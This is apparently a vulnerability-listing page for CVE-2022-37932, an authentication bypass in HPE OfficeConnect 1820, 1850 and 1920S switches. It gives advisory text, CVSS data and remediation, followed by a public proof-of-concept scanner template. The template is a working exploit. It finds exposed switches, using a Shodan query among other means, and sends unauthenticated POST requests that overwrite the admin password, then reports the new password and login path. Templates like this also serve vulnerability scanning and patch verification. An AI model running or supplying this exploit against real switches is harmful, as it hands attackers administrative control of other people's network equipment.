A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has made the following software updates to resolve the vulnerability in Hewlett Packard Enterprise OfficeConnect 1820, 1850 and 1920S Network switches versions- Prior to PT.02.14; Prior to PC.01.22; Prior to PO.01.21; Prior to PD.02.22;
PoC代码[已公开]
id: CVE-2022-37932
info:
name: HP Switch - Authentication Bypass
author: Phulelouch
severity: high
description: |
A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has made the following software updates to resolve the vulnerability in Hewlett Packard Enterprise OfficeConnect 1820, 1850 and 1920S Network switches versions- Prior to PT.02.14; Prior to PC.01.22; Prior to PO.01.21; Prior to PD.02.22;
impact: |
Attackers on the adjacent network can bypass authentication on HP OfficeConnect switches without credentials, potentially gaining administrative access to modify switch configurations, intercept network traffic, or disrupt network operations.
remediation: |
Update to HPE OfficeConnect switch firmware version PT.02.14 or later for 1820 series, PC.01.22 or later for 1850 series, or PO.01.21/PD.02.22 or later for 1920S series.
classification:
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-37932
epss-score: 0.79616
epss-percentile: 0.9905
cpe: cpe:2.3:o:hpe:officeconnect_1820_j9979a_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: hpe
product: officeconnect_1820_j9979a_firmware
shodan-query: html:"HPE OfficeConnect"
tags: cve,cve2022,hp,officeconnect,auth-bypass,intrusive,vkev,vuln
variables:
password: "{{rand_base(8)}}"
flow: http(1) && (http(2) || http(3))
http:
- method: GET
path:
- "{{BaseURL}}/"
redirects: true
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, '<title>HPE OfficeConnect Switch 1920')"
condition: and
internal: true
- raw:
- |
POST /login/default_password_cfg.lua HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&oldPwd=&newPwd={{password}}&confirmPwd={{password}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "redirect")'
- 'contains(content_type, "application/json")'
condition: and
extractors:
- type: json
name: redirect
part: body
json:
- .redirect
internal: true
- type: dsl
dsl:
- '"Password:"+ password'
- '"Login Path:"+ redirect'
- raw:
- |
POST /htdocs/login/default_password_cfg.lua HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&oldPwd=&newPwd={{password}}&confirmPwd={{password}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "redirect")'
- 'contains(content_type, "application/json")'
condition: and
extractors:
- type: json
name: redirect
part: body
json:
- .redirect
internal: true
- type: dsl
dsl:
- '"Password:"+ password'
- '"Login Path:"+ redirect'
# digest: 490a004630440220717467d7e13b627a39e4691b205f64c445e7ce0364f6905b0040f305ca0e87ed0220513c91cba04f97db59c55a75f06b99cd19117878c6c4f98ceb4d835d2e91a1ed:922c64590222798bb761d5b6d8e72950